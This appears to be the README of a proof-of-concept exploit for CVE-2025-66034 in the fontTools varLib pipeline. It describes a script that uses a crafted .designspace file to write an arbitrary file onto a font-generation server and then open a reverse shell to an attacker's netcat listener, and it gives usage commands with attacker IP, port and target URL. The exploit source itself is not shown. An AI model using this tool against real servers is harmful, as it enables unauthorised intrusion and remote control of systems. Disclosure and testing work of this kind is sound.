Share
## https://sploitus.com/exploit?id=EFE0EE91-9B61-58C9-B033-35D786E4ADEE
# fontTools varLib CVE-2025-66034 Exploit


  
  
  
  
  
  
  
  


This repo doesn't introduce a new vulnerability.

This is a Proof-of-concept exploit for **CVE-2025-66034** affecting the fontTools varLib variable font generation pipeline.

The vulnerability allows attackers to control the output filename inside a crafted `.designspace` file. When processed by a vulnerable font generation service, this can lead to **arbitrary file write** on the server filesystem.

The script **`varlib_cve_2025_66034.py`** automates payload creation, font generation, upload, and optional shell triggering.

---

## Features

- Automatic creation of compatible master fonts using fontTools
- Randomized shell filename generation
- Customizable target path and upload endpoint
- Automatic `nc` listener
- No manual font preparation required

---

## Requirements

Python **3.9+**

Install dependencies:

```bash
pip install fonttools requests
```

Netcat is required for the listener:

---


## Usage

**If the target upload endpoint, filesystem write path, and web-accessible trigger path match the defaults in the script, you can run it directly.**

Basic usage:

```bash
python varlib_cve_2025_66034.py --ip  --port 
```
**If the target uses different paths and URLs (MOST LIKELY), override them with the available arguments such as --url and --path. as per below options**
## Options

| Argument | Description |
|--------|--------|
| `--ip` | Attacker listener IP |
| `--port` | Listener port |
| `--path` | Target filesystem path for written file |
| `--url` | Vulnerable upload endpoint |
| `--no-listen` | Disable automatic netcat listener |

Example with custom options:

```bash
python varlib_cve_2025_66034.py --ip 10.10.14.236 --port 4444 --path /var/www/html --url http://target/tools/variable-font-generator/process
```

---

## Exploit Workflow

1. Generate compatible master fonts
2. Create malicious `.designspace` file
3. Upload payload via multipart POST
4. Write arbitrary file on the server
5. Trigger the payload via HTTP request

---

## Credits / Acknowledgements

Special thanks and respect to:

- The fontTools project maintainers and contributors for their work on the open‑source fontTools library.
- The security researchers who discovered and responsibly disclosed **CVE-2025-66034**.
- The open‑source security community for documenting and analyzing vulnerabilities that help improve software security.

This proof-of-concept is provided for educational and research purposes to help understand the vulnerability and its impact.

---

## Disclaimer

This code is provided **for educational and research purposes only**.

Do not use this exploit against systems you do not own or have explicit permission to test.

The author is not responsible for misuse or damage caused by this software.

---

## References

- CVE Details: https://nvd.nist.gov/vuln/detail/CVE-2025-66034
- GitHub Advisory: https://github.com/advisories/GHSA-768j-98cg-p3fv
- fontTools Project: https://github.com/fonttools/fonttools
- fontTools Documentation: https://fonttools.readthedocs.io/